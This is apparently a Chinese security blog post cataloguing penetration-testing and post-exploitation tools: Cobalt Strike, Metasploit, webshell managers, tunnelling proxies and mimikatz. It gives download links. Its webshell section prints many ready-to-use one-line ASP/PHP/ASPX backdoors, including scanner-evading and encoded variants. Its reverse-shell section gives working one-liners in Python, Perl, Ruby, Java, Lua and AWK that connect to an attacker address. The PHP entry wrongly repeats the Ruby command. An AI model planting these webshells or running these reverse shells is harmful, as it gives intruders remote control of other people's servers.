常见测试工具识别

常见测试工具识别

一、后渗透测试框架

1.Cobalt Strike

Cobalt Strike 一款以Metasploit为基础的GUI框架式渗透测试工具，集成了端口转发、服务扫描，自动化溢出，多模式端口监听，exe、powershell木马生成等。

钓鱼攻击包括：站点克隆，目标信息获取，java执行，浏览器自动攻击等。

Cobalt Strike 主要用于团队作战，可谓是团队渗透神器，能让多个攻击者同时连接到团体服务器上，共享攻击资源与目标信息和sessions。

Cobalt Strike 作为一款协同APT工具，针对内网的渗透测试和作为apt的控制终端功能，使其变成众多APT组织的首选。

访问地址：https://www.cobaltstrike.com/

2.Metasploit

Metasploit是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。这些功能包括智能开发，代码审计，Web应用程序扫描，社会工程。团队合作，在Metasploit和综合报告提出了他们的发现。
下载地址：https://www.rapid7.com/products/metasploit/download/

二、webshell

1. 一句话木马

一句话木马短小精悍，而且功能强大，隐蔽性非常好，在入侵中始终扮演着强大的作用。一句话木马一般配合中国菜刀或者蚁剑等一起使用，被上传一句话木马的服务器相当于被控端，中国菜刀或者蚁剑则相当于控制端。一句话木马的本质是代码执行。
常用一句话木马

asp一句话木马：
　　 <%execute(request("value"))%>
　　php一句话木马：
　　 <?php @eval($_POST[value]);?>
　　aspx一句话木马：
　　<%@ Page Language="Jscript"%>
　　<%eval(Request.Item["value"])%>
其他一句话木马：
<%eval request("value")%>
　　<%execute request("value")%>
　　<%execute(request("value"))%>
　　<%If Request("value")<>"" Then Execute(Request("value"))%>
　　<%if request ("value")<>""then session("value")=request("value"):end if:if session("value")<>"" then execute session("value")%>
　　<SCRIPT language=VBScript runat="server">execute request("value")</SCRIPT>
　　<%@ Page Language="Jscript"%>
　　<%eval(Request.Item["value"],"unsafe");%> 
　　可以躲过雷客图的一句话木马：
　　<%
　　set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
　　ms.Language="VBScript"
　　ms.AddObject "Response", Response
　　ms.AddObject "request", request
　　ms.ExecuteStatement("ev"&"al(request(""value""))")
　　%>
　　不用'<,>'的asp一句话木马：
　　<script language=VBScript runat=server>execute request("value")</script> 
　　不用双引号的一句话木马：
　　<%eval request(chr(35))%>
UTF-7编码加密:
<%@ codepage=65000%><% response.Charset=”936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>

2. 冰蝎

冰蝎”是一个动态二进制加密网站管理客户端。在实战中，第一代webshell管理工具”菜刀”的流量特征非常明显，很容易就被安全设备检测到。基于流量加密的webshell变得越来越多，”冰蝎”在此应运而生。

“冰蝎”客户端基于JAVA，所以可以跨平台使用，最新版本为v2.0.1，兼容性较之前的版本有较大提升。主要功能为：基本信息、命令执行、虚拟终端、文件管理、Socks代理、反弹shell、数据库管理、自定义代码等，功能非常强大。

下载地址：https://www.hedysx.com/2388.html

3.webshell三剑客

aspxspy、phphspy、jspspy
下载地址：https://www.webshell.cc/4422.html
ASPSPY：http://www.rootkit.net.cn/article.asp?id=132<已关闭
下载：ASPXspy2
JSPSPY：http://www.forjj.com/?action=show&id=138 <已关闭>
下载：jspspy
PHPSPY：http://www.4ngel.net/project/phpspy.htm
下载：phpspy

三、代理

1.Termite

工具在多种操作系统下均有Agent实现，由于代码为标准C实现，所以未来还将有更多的平台被支持。
Agent节点可相互连接，进而形成一条树状管理拓扑，依赖该拓扑结构，使用者可实时管理拓扑中的任意主机节点。
管理员可通过Admin程序，对拓扑中的任意节点进行管控，包括但不限于文件传输/控制台命令执行/开启远程 SOCKS5 代理服务/远程端口转发，等功能。

下载地址：http://rootkiter.com/Termite/

2.frp

frp 是一个高性能的反向代理应用，可以帮助您轻松地进行内网穿透，对外网提供服务，支持 tcp, http, https 等协议类型，并且 web 服务支持根据域名进行路由

下载地址：https://github.com/fatedier/frp

3.nps

NPS 是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持 tcp、udp 流量转发，可支持任何 tcp、udp 上层协议（访问内网网站、本地支付接口调试、ssh 访问、远程桌面，内网dns解析等等……），此外还支持内网 http 代理、内网 socks5 代理、p2p 等，并带有功能强大的 web 管理端。

全面的协议支持，与几乎所有常用协议兼容，例如tcp，udp，http（s），socks5，p2p，http代理…
全面的平台兼容性（Linux，Windows，MacOS，群晖等），仅支持作为系统服务进行安装。
全面控制，允许客户端和服务器控制。
Https集成，支持将后端代理和Web服务转换为https，并支持多个证书。
只需在Web ui上进行简单配置即可完成大多数要求。
完整的信息显示，例如流量，系统信息，实时带宽，客户端版本等。
强大的扩展功能，一切可用（缓存，压缩，加密，流量限制，带宽限制，端口重用等）
域名解析具有诸如自定义标题，404页面配置，主机修改，站点保护，URL路由和全景解析之类的功能。
服务器上的多用户和用户注册支持。

4.reGeorg

在大多数的文章中，都把reGeorg称为内网代理。实际上，它也确实在渗透的过程中，起到了代理的作用。

考虑一种场景，资产组里有2台机器：主机A、主机B。其中主机A上运行了Web服务，且IP或者端口映射到公网，可以被外部人员访问，主机B是在外网访问不到的。攻击者通过漏洞在主机A上传了Webshell，但同时又出于某些限制并未能得到主机A的主机权限也无法反弹shell，那么他这个时候，也是无法通过常规方法反弹shell或者直接登录主机A从而访问到主机B的。

reGeorg就在这个时候起了作用，攻击者已经有了主机A的webshell权限（即可以在web服务器中上传文件），而主机A可以和主机B通信。那么在主机A上安装reGeorg工具，使得攻击者发出的请求以及目标机器的响应经过A的http转发，达到攻击者可以和主机B进行通信的效果。

下载地址：https://github.com/L-codes/Neo-reGeorg 
https://github.com/sensepost/reGeorg

四、反弹shell

反弹shell（reverse shell），就是控制端监听在某TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。reverse shell与telnet，ssh等标准shell对应，本质上是网络概念的客户端与服务端的角色反转。
以上脚本是在目标主机上执行，其中 x.x.x.x 均为攻击主机ip，并且需要提前在攻击主机上进行监听相关端口,接下来就不再赘

1.python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

2. perl

方法一：

Perl -e 'use Socket;$i="x.x.x.x";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

方法二：

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:5555");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

3.Ruby

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("x.x.x.x","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

4.PHP

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("x.x.x.x","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

5. Java

public class Revs {
    /**
    * @param args
    * @throws Exception 
    */
    public static void main(String[] args) throws Exception {
        // TODO Auto-generated method stub
        Runtime r = Runtime.getRuntime();
        String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/x.x.x.x/5555;cat <&5 | while read line; do $line 2>&5 >&5; done"};
        Process p = r.exec(cmd);
        p.waitFor();
    }
}

6.Lua

lua -e "require('socket');require('os');t=socket.tcp();t:connect('x.x.x.x','5555');os.execute('/bin/sh -i <&3 >&3 2>&3');"

7. AWK 反弹

awk 'BEGIN{s="/inet/tcp/0/x.x.x.x/8080";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'

五、口令

1.mimikatz

mimikatz 是一款windows平台下的神器，它具备很多功能，我认为最牛逼的是lsass.exe进程中获取windows的账号明文密码，当然他的其他功能也很强大。是在下才疏学浅，没有精通。

下载地址：https://github.com/gentilkiwi/mimikatz

2.超级弱口令检查工具

超级弱口令检查工具是一款Windows平台的弱口令审计工具,支持批量多线程检查,可快速发现弱密码、弱口令账号,密码支持和用户名结合进行检查,大大提高成功率,支持自定义服务端口和字典。工具采用C#开发,需要安装.NET Framework 4.0,工具目前支持SSH、RDP、MySQL…

我的公众号

我的公众号
后续操作请持续关注哦！！！
了解更多请关注下列公众号：
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗

😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗